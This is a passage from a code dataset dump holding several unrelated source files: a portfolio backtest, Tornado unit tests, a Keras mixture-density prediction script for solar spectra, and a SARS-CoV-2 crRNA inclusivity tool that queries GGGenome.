대체\n\n# 연도별로 cumulative_returns 분할\nyears = list(range(2003, 2021))\nannual_returns = []\n\nfor i in range(0, len(years) - 1): # 마지막 연도는 별도로 처리\n start_index = i * (12 // (invest_window // 20))\n end_index = start_index + (12 // (invest_window // 20))\n\n # out-of-bounds 오류\n if end_index >= len(cumulative_returns):\n end_index = len(cumulative_returns) - 1\n\n annual_return = cumulative_returns[end_index] - cumulative_returns[start_index]\n annual_returns.append(annual_return)\n\n# 마지막 연도의 수익률을 별도로 계산\nstart_index = (years[-1] - 2003) * (12 // (invest_window // 20))\nif start_index < len(cumulative_returns):\n annual_return = cumulative_returns[-1] - cumulative_returns[start_index]\n annual_returns.append(annual_return)\n\n# profitable과 unprofitable years 계산\nprofitable_years = len([r for r in annual_returns if r > 0])\nunprofitable_years = len([r for r in annual_returns if r <= 0])\n\nprint(f\"Profitable Years: {profitable_years}\")\nprint(f\"Unprofitable Years: {unprofitable_years}\")\nprint(round(annual_log_return, 3))\nprint(round(annual_volatility, 3))\nprint(round(sharpe_ratio, 3))\nprint(round(sortino_ratio, 3))\nprint(round(downside_volatility, 3))\nprint(round(profit_factor, 3))\nprint(round(gross_profit, 3))\nprint(round(gross_loss, 3))\nprint(round(mdd, 3))\nprint(round(calmar_ratio, 3))\n\n","repo_name":"yejiikim/BLPortfolio-KShape","sub_path":"markowitz/4. markowitz.py","file_name":"4. 
markowitz.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34565145093","text":"# -*- coding: utf-8 -*-\n#\n# H A P P Y H A C K I N G !\n# _____ ______\n# ____==== ]OO|_n_n__][. | |\n# [________]_|__|________)< |YANG|\n# oo oo 'oo OOOO-| oo\\\\_ ~o~~o~\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+\n# Jianing Yang @ 16 Feb, 2018\n#\nfrom tornado.testing import AsyncHTTPTestCase\nfrom tornado_battery.extra import try_get_value, CORSHandlerMixin\nfrom tornado_battery.schema import schema\nfrom tornado.web import Application as WebApplication, RequestHandler\nfrom tornado.options import options\nimport pytest\n\n\n@pytest.fixture\ndef data():\n\n return {\n '1': {\n 'A': {\n 'a': 'value',\n },\n 'B': 'Bvalue',\n },\n }\n\n\ndef test_last_node(data):\n assert try_get_value(data, '1.A.a', None) == 'value'\n\n\ndef test_last_non_exists(data):\n assert try_get_value(data, '1.A.b', 'n/a') == 'n/a'\n\n\ndef test_middle_non_exists(data):\n assert try_get_value(data, '1.c.a', 'n/a') == 'n/a'\n\n\ndef test_middle_node(data):\n assert try_get_value(data, '1.B', 'n/a') == 'Bvalue'\n\n\ndef test_empty(data):\n assert try_get_value(data, '', 'n/a') == 'n/a'\n\n\ndef test_non_dict():\n assert try_get_value(1, '', 'n/a') == 'n/a'\n\n\nclass CORSHandler(CORSHandlerMixin, RequestHandler):\n\n @schema(reply=True)\n async def get(self):\n return dict(name='john', age=20)\n\n def options(self):\n super().options()\n\n\nclass TestApp(AsyncHTTPTestCase):\n\n def get_app(self):\n app = WebApplication([\n (r'/cors', CORSHandler),\n ])\n return app\n\n def test_cors_with_debug(self):\n options.debug = True\n response = self.fetch('/cors', method='GET')\n options.debug = False\n headers = response.headers\n assert headers['Access-Control-Allow-Origin'] == '*'\n assert (headers['Access-Control-Allow-Methods'] ==\n 'GET, POST, PUT, DELETE, OPTIONS, HEAD, PATCH')\n assert headers['Access-Control-Max-Age'] == '3600'\n assert (headers['Access-Control-Allow-Headers'] ==\n 'Content-Type, Access-Control-Allow-Headers')\n assert response.code == 200\n options.debug = True\n response = self.fetch('/cors', method='OPTIONS')\n headers = response.headers\n options.debug = False\n assert headers['Allow'] == 'POST, GET, PUT, DELETE, OPTIONS, PATCH'\n\n def test_cors(self):\n response = self.fetch('/cors', method='GET')\n headers = response.headers\n assert 'Access-Control-Allow-Origin' not in headers\n assert 'Access-Control-Allow-Methods' not in headers\n assert 'Access-Control-Max-Age' not in headers\n assert 'Access-Control-Allow-Headers' not in headers\n assert response.code == 200\n response = self.fetch(f'/cors', method='OPTIONS')\n assert 'Allow' not in headers\n","repo_name":"jianingy/tornado_battery","sub_path":"tests/test_extra.py","file_name":"test_extra.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"32744819406","text":"import numpy as np\nimport platform\nimport json\nimport sys\nimport os\nimport copy\nimport argparse\nimport time\n\nfrom scipy.io import netcdf\nfrom ipdb import set_trace as stop\n\nimport keras.backend as K\nfrom keras.callbacks import CSVLogger, LearningRateScheduler, ModelCheckpoint\nfrom keras.layers import Input, Lambda, Dense, Flatten, BatchNormalization, Activation, Conv1D, add, concatenate\nfrom keras.models import Model, load_model\nfrom keras.optimizers import Adam\nfrom keras.utils 
import plot_model\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nimport pandas as pd\nfrom contextlib import redirect_stdout\n\ndef residual(inputs, n_filters, activation, strides):\n x0 = Conv1D(n_filters, 1, padding='same', kernel_initializer='he_normal', strides=strides)(inputs)\n\n x = Conv1D(n_filters, 3, padding='same', kernel_initializer='he_normal', strides=strides)(inputs)\n x = BatchNormalization()(x)\n x = Activation(activation)(x) \n x = Conv1D(n_filters, 3, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = add([x0, x])\n\n return x\n\nclass kernel_mixture_network(object):\n\n def __init__(self, parsed):\n\n self.root = parsed['model']\n self.var = parsed['var']\n\n self.lower = np.asarray([0.05, -5.0, 5.0, 0.0, 0.0, 0.0, -180.0, 0.0, -180.0])\n self.upper = np.asarray([3.0, 5.0, 18.0, 0.5, 1000.0, 180.0, 180.0, 180.0, 180.0])\n\n tmp = np.load(\"{0}_{1}_centers.npz\".format(self.root, self.var))\n self.center_locs = tmp['center_locs']\n self.sigmas = tmp['sigmas']\n\n self.n_modes = len(self.sigmas)\n\n self.oneDivSqrtTwoPI = 1.0 / np.sqrt(2.0*np.pi) # normalisation factor for gaussian.\n\n def gaussian_distribution(self, y, mu, sigma):\n result = (y - mu) / sigma\n result = - 0.5 * (result * result)\n return (K.exp(result) / sigma) * self.oneDivSqrtTwoPI\n\n def gaussian_distribution_np(self, y, mu, sigma):\n result = (y - mu) / sigma\n result = - 0.5 * (result * result)\n return (np.exp(result) / sigma) * self.oneDivSqrtTwoPI\n \n def mdn_loss_function(self, args):\n y, weights = args\n result = self.gaussian_distribution(y, self.center_locs, self.sigmas) * weights\n result = K.sum(result, axis=1)\n result = - K.log(result)\n return K.mean(result)\n\n def read_data(self):\n print(\"Reading data...\")\n self.f = netcdf.netcdf_file('/net/viga/scratch1/deepLearning/DNHazel/database/database_mus_1000000.db', 'r')\n self.stokes = self.f.variables['stokes'][:]\n self.parameters = self.f.variables['parameters'][:]\n self.n_lambda = len(self.stokes[0,:,0])\n self.n_training = 1000 #int(self.fraction_training * len(self.stokes[0,0,:]))\n\n mu = self.parameters[7,:]\n thB = self.parameters[5,:] * np.pi / 180.0\n phiB = self.parameters[6,:] * np.pi / 180.0\n\n cosThB = mu * np.cos(thB) + np.sqrt(1.0-mu**2) * np.sin(thB) * np.cos(phiB)\n sinThB = np.sqrt(1.0 - cosThB**2)\n\n cosPhiB = (mu * np.sin(thB) * np.cos(phiB) - np.sqrt(1.0-mu**2) * np.cos(thB)) / sinThB\n sinPhiB = np.sin(thB) * np.sin(phiB) / sinThB\n\n ThB = np.arctan2(sinThB, cosThB) * 180.0 / np.pi\n PhiB = np.arctan2(sinPhiB, cosPhiB) * 180.0 / np.pi\n\n# Add training data, which include the Stokes parameters, the value of the output variable and mu\n self.train = []\n self.train.append(self.stokes[:,:,0:self.n_training].T.reshape((self.n_training, self.n_lambda, 4)).astype('float32'))\n if (self.var == 'tau'):\n var = self.parameters[0,0:self.n_training].reshape((self.n_training, 1)) / 2.0\n if (self.var == 'v'):\n var = self.parameters[1,0:self.n_training].reshape((self.n_training, 1)) / 5.0\n if (self.var == 'vth'):\n var = self.parameters[2,0:self.n_training].reshape((self.n_training, 1)) / 10.0\n if (self.var == 'a'):\n var = self.parameters[3,0:self.n_training].reshape((self.n_training, 1)) / 0.5\n if (self.var == 'B'):\n var = self.parameters[4,0:self.n_training].reshape((self.n_training, 1)) / 1000.0\n if (self.var == 'thB'):\n var = thB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n if (self.var == 'phiB'):\n var = 
phiB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n        if (self.var == 'thB_LOS'):\n            var = ThB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n        if (self.var == 'phiB_LOS'):\n            var = PhiB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n\n        self.train.append(var.astype('float32'))\n        self.train.append(self.parameters[-1,0:self.n_training].reshape((self.n_training, 1)).astype('float32'))\n\n    def build_estimator(self):\n\n# Inputs\n        input_x = Input(shape=(self.n_lambda,4), name='stokes_input')\n        y_true = Input(shape=(1,), name='y_true')\n        mu_input = Input(shape=(1,), name='mu_input')\n\n# Neural network\n        x = Conv1D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', name='conv_1')(input_x)\n\n        for i in range(3):\n            x = residual(x, 64*(i+1), 'relu', strides=2)\n\n        intermediate = Flatten(name='flat')(x)\n        intermediate_conv = concatenate([intermediate, mu_input], name='FC')\n\n# Output weights\n        weights = Dense(self.n_modes, activation='softmax', name='weights')(intermediate_conv)\n\n# Definition of the loss function\n        loss = Lambda(self.mdn_loss_function, output_shape=(1,), name='loss')([y_true, weights])\n\n        self.model = Model(inputs=[input_x, y_true, mu_input], outputs=[loss])\n        #self.model.add_loss(loss)\n\n# Compile with the loss weight set to None, so it will be omitted\n        #self.model.compile(loss=[None], loss_weights=[None], optimizer=Adam(lr=self.lr))\n        self.model.load_weights(\"{0}_{1}_best.h5\".format(self.root, self.var))\n\n# Now generate a second network that ends up in the weights for later evaluation\n        self.model_weights = Model(inputs=self.model.input,\n                                 outputs=self.model.get_layer('weights').output)\n\n    def forward_network(self):\n        print(\"Reading network...\")\n        self.build_estimator()\n\n        y = np.linspace(0.0,2.0,300).reshape((300,1))\n\n        weights = self.model_weights.predict(self.train)\n\n        prob = np.zeros((self.n_training,300))\n\n        for i in range(self.n_training):\n            result = self.gaussian_distribution_np(y, self.center_locs, self.sigmas) * weights[i,:]\n            prob[i,:] = np.sum(result, axis=-1)\n\n        stop()\n\n    def predict_density(self, x_test):\n        y = np.linspace(-10,10,300).reshape((300,1))\n        weights = self.model_weights.predict(x_test)\n        result = self.gaussian_distribution_np(y, self.center_locs, self.sigmas) * weights\n        result = np.sum(result, axis=-1)\n        return y, result\n\nif (__name__ == '__main__'):\n\n\n    parser = argparse.ArgumentParser(description='Predict for KMN')\n    parser.add_argument('-o','--model', help='Output files', required=True)\n    parser.add_argument('-b','--batch_size', help='Batch size', default=256)\n    parser.add_argument('-v','--var', help='Variable to train', choices=['tau','v','vth','a','B','thB','phiB','thB_LOS','phiB_LOS'], \n                    default='tau', required=True)\n\n    parsed = vars(parser.parse_args())\n\n    out = kernel_mixture_network(parsed)\n    out.read_data()\n\n    out.forward_network()","repo_name":"aasensio/DeepLearning","sub_path":"DNHazel/testing/test_kmn.py","file_name":"test_kmn.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
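The kernel-mixture density in the entry above is just a weighted sum of fixed Gaussian kernels. A self-contained NumPy sketch of that assembly; center_locs, sigmas and weights here are hypothetical stand-ins for the arrays loaded in __init__ and the softmax output of the network:

    import numpy as np
    center_locs = np.array([0.2, 0.5, 0.8])   # hypothetical kernel centers
    sigmas = np.array([0.1, 0.1, 0.1])        # hypothetical kernel widths
    weights = np.array([0.2, 0.5, 0.3])       # softmax weights predicted by the network
    y = np.linspace(0.0, 2.0, 300).reshape((300, 1))
    norm = 1.0 / np.sqrt(2.0 * np.pi)
    # one Gaussian kernel per mode, evaluated on the whole y grid via broadcasting
    kernels = np.exp(-0.5 * ((y - center_locs) / sigmas) ** 2) / sigmas * norm
    density = np.sum(kernels * weights, axis=-1)  # mixture density over the y grid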
+{"seq_id":"70242627641","text":"import os\nimport gzip\nfrom argparse import ArgumentParser\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom tqdm import tqdm\nimport subprocess\nimport io\nfrom math import floor\nfrom pathlib import Path\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass FastaExtract(object):\n    def __init__(self, args):\n        self.mafft_alignment = args.alignment\n        self.sequence = args.sequence\n        self.list = args.list\n        self.cutoff = args.cutoff\n        self.ref = args.reference\n        self.gap = args.gap\n        self.mismatch = args.mismatch\n        self.output_folder = args.output\n\n        # Data\n        self.sample_dict = dict()\n\n        # Output files\n        alignment_name = '.'.join(os.path.basename(self.mafft_alignment).split('.')[:-1])\n        self.extracted = self.output_folder + alignment_name + '_extracted.txt'\n        self.output_tsv = self.output_folder + '/ROI_stats.tsv'\n        self.masked_output_tsv = self.output_folder + '/ROI_masked_stats.tsv'\n        self.gggenome_raw_output_tsv = self.output_folder + '/GGGenome_matches.tsv'\n        self.gggenome_summary_output_tsv = self.output_folder + '/GGGenome_summary.tsv'\n\n        # Run\n        self.run()\n\n    def run(self):\n        self.check()  # Check if can find input alignment file\n\n        # Samples\n        if self.list:\n            self.sample_dict = FastaExtract.parse_list(self.list)\n        elif self.sequence:\n            self.sample_dict = {'crRNA': self.sequence}\n\n        alignment_name = '.'.join(os.path.basename(self.mafft_alignment).split('.')[:-1])\n\n        # Loop all the input sequences\n        for desc, sequence in self.sample_dict.items():\n            print(sequence)\n            # Output files\n            extracted = self.output_folder + '/' + alignment_name + '_' + desc + '_extracted.txt'\n            output_tsv = self.output_folder + '/ROI_stats' + '_' + desc + '.tsv'\n            masked_output_tsv = self.output_folder + '/ROI_masked_stats' + '_' + desc + '.tsv'\n            gggenome_raw_output_tsv = self.output_folder + '/GGGenome_matches' + '_' + desc + '.tsv'\n            gggenome_summary_output_tsv = self.output_folder + '/GGGenome_summary' + '_' + desc + '.tsv'\n\n            # Compute the maximum number of mismatch(es) automatically based on query length\n            max_diff = int(floor(len(sequence) * self.mismatch))\n            print('Performing cross-reactivity test with up to {} mismatch(es)'.format(max_diff))\n\n            # GGGenome\n            ggg_df, diff_dict = FastaExtract.loop_gggenome(sequence, max_diff, self.gap)\n\n            # Write GGGenome df to CSV file\n            FastaExtract.print_table(ggg_df, gggenome_raw_output_tsv)\n\n            # Create GGGenome summary dataframe\n            sum_df = FastaExtract.create_gggenome_summary(diff_dict, max_diff)\n\n            # Write GGGenome summary to file from dataframe\n            FastaExtract.print_table(sum_df, gggenome_summary_output_tsv)\n\n            # Extract start and end positions from the reference Wuhan sequences to perform the inclusivity analysis\n            start, end = FastaExtract.get_start_end_positions(ggg_df)\n\n            ##### Inclusivity test #####\n\n            print('\\nPerforming inclusivity test')\n\n            roi_ref = FastaExtract.extract_ref(self.ref, start, end)\n            print('\\tReference ROI: {} ({}..{})'.format(roi_ref, start, end))\n\n            # Parse alignment file to extract counts for each variant of the region of interest\n            print('\\tParsing MAFFT alignment file and extracting ROI for each entry')\n            FastaExtract.extract(self.mafft_alignment, extracted, start, end)  # comment for debug\n            roi_dict = FastaExtract.filter_n(extracted)\n\n            # Output the variant frequency table\n            print('\\tFiltering ROI and preparing report file')\n            # Replace conserved bases with dots\n            df = FastaExtract.filter_cutoff(roi_dict, self.cutoff, roi_ref)\n            FastaExtract.print_table(df, output_tsv)  # Print table\n\n            # Mask sequences\n            FastaExtract.mask_alignment(df)\n            FastaExtract.print_table(df, masked_output_tsv)\n\n        print('\\nDone!')\n\n    def check(self):\n        # Replace tilde (~) with home folder path\n        if '~' in self.mafft_alignment:\n            self.mafft_alignment = os.path.expanduser(self.mafft_alignment)\n        # Check if path to 
MAFFT file is correct\n if not os.path.isfile(self.mafft_alignment):\n raise Exception('Could not locate alignment file. Please use absolute path to file.')\n # Check if mismatches/gaps is 25% or less. Otherwise GGGenome will return an error.\n if self.mismatch > 0.25:\n raise Exception('Number of mismatches/gaps should be 25% (0.25) or less.')\n # Check if using a single sequence (-l) or a sequence list file\n if self.sequence and self.list:\n raise Exception('Cannot use \"-s\" and \"-list\" options simultaneously.')\n if not self.sequence and not self.list:\n raise Exception('Please use \"-s\" or \"-l\".')\n # Check if sequence list file exists\n if self.list:\n if not os.path.isfile(self.list):\n raise Exception('Could not locate list file. Please use absolute path to file.')\n # Check for illegal characters in sequences\n if self.list:\n if not all(FastaExtract.check_sequence(seq) for desc, seq in self.sample_dict.items()):\n raise Exception('Query sequence contains illegal bases. Only \"ATUCGN\" are accepted.')\n elif self.sequence:\n if not FastaExtract.check_sequence(self.sequence):\n raise Exception('Query sequence contains illegal bases. Only \"ATUCGN\" are accepted.')\n # Create output folder, in case it doesn't exists\n FastaExtract.make_folder(self.output_folder)\n\n @staticmethod\n def make_folder(folder):\n # Will create parent directories if don't exist and will not return error if already exists\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n @staticmethod\n def check_sequence(seq):\n return all(nuc in ['A', 'T', 'C', 'G', 'U', 'N'] for nuc in seq)\n\n @staticmethod\n def parse_list(list_file):\n sample_dict = dict()\n with open(list_file, 'r') as f:\n for line in f:\n line = line.rstrip()\n desc = line.split('\\t')[0].replace(' ', '_') # Replace space by underscore\n seq = line.split('\\t')[1]\n sample_dict[desc] = seq\n return sample_dict\n\n @staticmethod\n def block_read(my_file, size=1048576):\n while True:\n b = my_file.read(size)\n if not b:\n break\n yield b\n\n @staticmethod\n def count_lines(my_file):\n total_cnt = 0 # Total entries in fasta file\n with gzip.open(my_file, 'rb', 1024*1024) if my_file.endswith('gz') \\\n else open(my_file, 'r', 1024*1024) as in_f:\n if my_file.endswith('gz'):\n total_cnt = sum(bl.count(b'\\n') for bl in FastaExtract.block_read(in_f))\n else:\n total_cnt = sum(bl.count('\\n') for bl in FastaExtract.block_read(in_f))\n return total_cnt\n\n @staticmethod\n def extract(input_alignment, extracted, start, end):\n\n start_index = start - 1\n end_index = end\n\n with open(extracted, 'w') as out_f:\n with gzip.open(input_alignment, 'rb', 1024*1024) if input_alignment.endswith('gz') \\\n else open(input_alignment, 'r', 1024*1024) as in_f:\n seq_list = list()\n for line in tqdm(in_f, total=FastaExtract.count_lines(input_alignment)):\n line = line.rstrip()\n if input_alignment.endswith('gz'):\n line = line.decode() # Convert from binary to string\n if not line: # If line is empty\n continue # Skip to next line\n\n if line.startswith('>') and not seq_list: # First line\n continue # Skip to next line\n elif line.startswith('>') and seq_list: # A new sequence starts\n seq = ''.join(seq_list) # Combine all lines if sequence spanned over multiple lines\n extracted_seq = seq[start_index:end_index].upper() # Extract region of interest by slicing\n out_f.write('{}\\n'.format(extracted_seq))\n seq_list = list() # Empty list that collects the\n else: # Sequence line\n seq_list.append(line) # Fetch sequences spanning over multiple lines\n # For the 
last entry in the file\n seq = ''.join(seq_list)\n extracted_seq = seq[start_index:end_index].upper()\n out_f.write('{}\\n'.format(extracted_seq))\n\n @staticmethod\n def filter_n(extracted_roi):\n seq_dict = dict()\n\n with open(extracted_roi, 'r', 1024*1024) as in_f:\n for line in in_f:\n line = line.rstrip()\n if not line: # If line is empty\n continue # Skip to next line\n if any([x in line for x in ['N', 'n']]): # Skip extracted sequences with Ns\n continue\n\n # Add to dictionary\n if line in seq_dict:\n seq_dict[line] += 1 # Increase count by 1\n else:\n seq_dict[line] = 1 # Set count to 1\n\n return seq_dict\n\n @staticmethod\n def extract_ref(ref, start, end):\n with gzip.open(ref, 'rb', 1024*1024) if ref.endswith('gz') \\\n else open(ref, 'r', 1024*1024) as in_f:\n seq_list = list()\n for line in in_f:\n line = line.rstrip()\n if not line:\n continue\n if line.startswith('>'):\n continue\n else:\n seq_list.append(line)\n extracted_ref = ''.join(seq_list)[start - 1: end]\n return extracted_ref\n\n @staticmethod\n def filter_cutoff(seq_dict, cutoff, roi_ref):\n # Convert dictionary to Pandas dataframe\n df = pd.DataFrame.from_dict(seq_dict, orient='index')\n\n # Add column at the end for frequencies\n total = df[0].sum() # Sum all the counts\n freq_list = [float('{:.2f}'.format(x/total*100)) for x in df[0]]\n df['Frequency (%)'] = freq_list\n\n # Compute the added % of the lines to remove (below the cutoff)\n df_rem = df[df['Frequency (%)'] < cutoff * 100]\n cnt_rem = df_rem[0].sum()\n freq_rem = float('{:.2f}'.format(cnt_rem/total*100))\n\n # Remove lines with frequency below cutoff\n df = df[df['Frequency (%)'] >= cutoff * 100]\n\n # Sort descending based on index values\n df.sort_values(by=0, ascending=False, inplace=True)\n\n # Add a new index column\n df.reset_index(inplace=True)\n\n # Change index values\n df.index = np.arange(1, len(df[0]) + 1)\n\n # Rename \"index\" column\n df = df.rename(columns={'index': 'Variant'})\n\n # Rename columns\n df.columns = ['Variant', 'Count', 'Frequency (%)']\n\n # Add name to index column\n df.index.rename('Group', inplace=True)\n\n # Move columns\n df = df[['Count', 'Frequency (%)', 'Variant']]\n\n # Insert reference sequence at first line\n new_row = pd.DataFrame({'Count': '', 'Frequency (%)': '', 'Variant': roi_ref}, index=['Wuhan-Hu-1'])\n df = pd.concat([new_row, df])\n\n # Add a row at the end named \"Removed\" with the added % of the removed lines so the added freq.=100%\n rem_row = pd.DataFrame({'Count': cnt_rem, 'Frequency (%)': freq_rem, 'Variant': ''},\n index=['Variants with frequency lower than {}%'.format(cutoff * 100)])\n df = pd.concat([df, rem_row])\n\n return df\n\n @staticmethod\n def mask_alignment(df):\n # Get ref sequence\n ref = df.loc['Wuhan-Hu-1', 'Variant']\n # compare to wild type\n for i, row in df.iterrows():\n if i == 'Wuhan-Hu-1': # Don't change the reference sequence\n continue\n seq = df.loc[i, 'Variant']\n seq_list = list()\n for j, b in enumerate(seq):\n if b == ref[j]:\n seq_list.append('.')\n else:\n seq_list.append(b)\n masked_seq = ''.join(seq_list)\n\n # Replace variant sequence in dataframe with masked one\n df.loc[i, 'Variant'] = masked_seq\n\n return df\n\n @staticmethod\n def print_table(df, output_tsv):\n with open(output_tsv, 'w') as out_f:\n df.to_csv(out_f, sep='\\t', header=True, index=True)\n\n @staticmethod\n def run_mafft(input_fasta, reference_fasta, mafft_cutoff):\n output_alignment = '.'.join(input_fasta.split('.')[:-1]) + '_mafft' + mafft_cutoff + '.fasta'\n cmd = ['mafft', '--auto', 
'--keeplength',\n               '--maxambiguous', str(mafft_cutoff),\n               '--addfragments', input_fasta, reference_fasta]\n        with open(output_alignment, 'w') as f:\n            subprocess.Popen(cmd, stdout=f)  # write standard output (alignment) to file\n\n    @staticmethod\n    def run_gggenome_online(seq, db, mismatch, gap=False):\n        \"\"\"\n        http://gggenome.dbcls.jp/help.html\n\n        http[s]://GGGenome.dbcls.jp/db/k/[strand]/[nogap]/sequence[.format][.download]\n        db: hg19, mm10, dm3, ce10, TAIR10, pombe, refseq, etc. (default: hg19)\n        Full list of databases is available below.\n        k: Maximum number of mismatches/gaps. (default: 0)\n        strand: '+' ('plus') or '-' ('minus') to search specified strand only. (optional)\n        nogap: No gaps. Allow only k mismatches. (optional)\n        sequence: Nucleotide sequence, case insensitive.\n        format: html, txt, csv, bed, gff, json. (default: html)\n        download: Download result as a file. (optional)\n        \"\"\"\n        # http://gggenome.dbcls.jp/COVID19-primercheck-EUA-20200501/5/TTTGCCCCCAGCGCTTCAGCGTT\n        # http://gggenome.dbcls.jp/hg38/4/nogap/TTTGCCCCCAGCGCTTCAGCGTT\n        url = 'https://GGGenome.dbcls.jp/{}/{}/nogap/{}.csv.download'.format(db, mismatch, seq)\n        if gap:\n            url = 'https://GGGenome.dbcls.jp/{}/{}/{}.csv.download'.format(db, mismatch, seq)\n        r = requests.get(url, stream=True)\n        if r.status_code != 200:\n            r.raise_for_status()\n            # raise Exception('Problem with GGGenome URL request: {}'.format(r.status_code))\n        else:\n            # Parse results into Pandas dataframe using \"fake\" file handle with StringIO\n            try:\n                df = pd.read_csv(io.StringIO(r.content.decode()), sep=',', skiprows=6)\n                return df\n            except Exception as e:\n                print(type(e).__name__, e)\n\n    @staticmethod\n    def loop_gggenome(roi_ref, max_diff, gap):\n        # Loop dataframe and check sequence with GGGenome\n        # Results are returned in a new dataframe\n\n        # Master GGGenome dataframe\n        ggg_df = pd.DataFrame(columns=['# name', 'strand', 'start', 'end', 'snippet', 'snippet_pos', 'snippet_end',\n                                       'query', 'sbjct', 'align', 'edit', 'match', 'mis', 'del', 'ins'])\n\n        # Reformat GGGenome output table\n        # Loop through GGGenome results for each query with increasing differences allowed\n        # TODO: check for hits in human genome too.\n        db_list = ['COVID19-primercheck-EUA-20200501', 'hg38']\n        for db in db_list:\n            print('\\tTesting query online with GGGenome using \"{}\" database'.format(db))\n            for diff in range(0, max_diff+1):\n                df1 = FastaExtract.run_gggenome_online(roi_ref, db, diff, gap)\n                # Check if results returned\n                if df1.empty or df1['# name'][0] == '### No items found. ###':\n                    continue\n                else:\n                    ggg_df = pd.concat([ggg_df, df1])\n\n        # Remove duplicated entries\n        ggg_df = ggg_df.drop_duplicates()\n\n        # Reset index. Some rows have the same index.\n        
ggg_df.reset_index(drop=True, inplace=True)\n\n        # Remove matches to unplaced contigs in human genome\n        search_list = ['_alt', '_random']\n        to_drop_list = ggg_df.index[ggg_df['# name'].str.contains('|'.join(search_list))].tolist()\n        ggg_df.drop(to_drop_list, inplace=True)\n        ggg_df.reset_index(drop=True, inplace=True)  # Reset pandas index\n\n        # Add results to summary dataframe\n        name_list = ggg_df['# name'].to_list()  # convert name column to list\n        org_list = [FastaExtract.extract_org(x) for x in name_list]\n\n        # remove duplicates from list\n        org_list = list(dict.fromkeys(org_list))\n        diff_dict = dict()\n\n        for org in org_list:\n            if org not in diff_dict.keys():\n                diff_dict[org] = dict()\n                # Generate headers for differences (mismatches and gaps)\n                for diff in range(0, max_diff+1):\n                    diff_dict[org][diff] = 0\n\n            # Fetch the difference values\n            if org.startswith('chr'):\n                matching_row_list = ggg_df.index[ggg_df['# name'] == org].tolist()\n            else:\n                matching_row_list = ggg_df.index[ggg_df['# name'].str.contains(org)].tolist()\n            for j in matching_row_list:\n                mismatches = len(roi_ref) - ggg_df.iloc[j]['match']\n                diff_dict[org][mismatches] += 1  # Add 1 to the count\n\n        return ggg_df, diff_dict\n\n    @staticmethod\n    def create_gggenome_summary(diff_dict, max_diff):\n        # Generate headers for differences (mismatches and gaps)\n        header_list = list()\n        for diff in range(0, max_diff+1):\n            header_list.append(str(diff))\n\n        # Convert dictionary to pandas dataframe\n        df = pd.DataFrame.from_dict(diff_dict, orient='index')\n\n        # Rename index column\n        df = df.rename_axis(\"Organism\")\n        # df.index.rename(['Organism'], inplace=True)\n\n        # Prepare name for columns\n        header_list = ['m' + str(x) for x in header_list]\n\n        # Rename columns\n        df.columns = header_list\n\n        # Add a column at the end with the total mismatches per organism\n        df['Total'] = df.sum(axis=1)\n\n        # Sort rows by 1) total number of mismatches and 2) alphabetically\n        df.sort_values(by=header_list, ascending=[False] * len(header_list), inplace=True)\n        # df.sort_index(ascending=True, inplace=True)  # Sort alphabetically\n\n        # Add a row at the end with total for each mismatch column\n        df.loc['Total'] = df.sum(numeric_only=True, axis=0)\n\n        return df\n\n    @staticmethod\n    def reverse_complement(seq):\n        rc_tab = str.maketrans('ATCG', 'TAGC')\n        return seq.translate(rc_tab)[::-1]\n\n    @staticmethod\n    def extract_org(header):\n        # regex = re.compile(r\"\\s*ctg\\s*\", flags=re.IGNORECASE)\n        org = header.split(' ')\n        if len(org) > 1:\n            org = header.split(' ', 1)[1]  # Ditch the accession number\n            org = org.split(',')[0]\n            org = org.split('chromosome')[0]\n            org = org.split('NODE')[0]\n            org_list = org.split()  # split string into list\n            for i, word in enumerate(org_list):\n                if any([substring in word for substring in ['ctg', 'scaf', 'scf']]):\n                    del org_list[i]\n            org = ' '.join(org_list)\n            org = org.split('contig')[0]\n            return org\n        else:  # hit in human genome (e.g. 
chr2)\n            return header\n\n    @staticmethod\n    def extract_acc(header):\n        return header.split(' ')[0]\n\n    @staticmethod\n    def get_start_end_positions(df):\n        return df.loc[0, 'start'], df.loc[0, 'end']\n\n\nif __name__ == '__main__':\n    parser = ArgumentParser(description='Extract region from fasta file.')\n    parser.add_argument('-a', '--alignment', metavar='mafft_alignment.fasta',\n                        required=True,\n                        type=str,\n                        help='Mafft alignment file.'\n                             ' Mandatory.')\n    parser.add_argument('-s', '--sequence', metavar='TTTNCCCCCAGCGCTTCAGCGTTC',\n                        required=False,\n                        type=str,\n                        help='Sequence to test (PAM+crRNA).'\n                             ' Must use \"-s\" or \"-l\".')\n    parser.add_argument('-l', '--list', metavar='sequence_list.tsv',\n                        required=False,\n                        type=str,\n                        help='A 2-column tab-separated file: Description<tab>Sequence.'\n                             ' Must use \"-s\" or \"-l\".')\n    parser.add_argument('-c', '--cutoff', metavar='0.001',\n                        type=float, default=0.001,\n                        required=False,\n                        help='Cutoff frequency to keep a variant. Must be between 0 and 1.'\n                             ' Default is 0.001.')\n    parser.add_argument('-r', '--reference', metavar='reference.fasta',\n                        required=True,\n                        type=str,\n                        help='Reference fasta file.'\n                             ' Mandatory.')\n    parser.add_argument('-o', '--output', metavar='/output/folder',\n                        required=True,\n                        type=str,\n                        help='Output folder path.')\n    parser.add_argument('-g', '--gap',\n                        action='store_true',\n                        help='Allows gaps in GGGenome search. Default is False.')\n    parser.add_argument('-m', '--mismatch', metavar='0.20',\n                        type=float,\n                        required=False,\n                        default=0.20,\n                        help='Percentage of mismatch allowed.'\n                             ' Minimum is 0 and maximum is 0.25 (GGGenome requirement).'\n                             ' Includes gaps if \"-g\" is used.'\n                             ' Default is 0.20.')\n\n    # Get the arguments into an object\n    arguments = 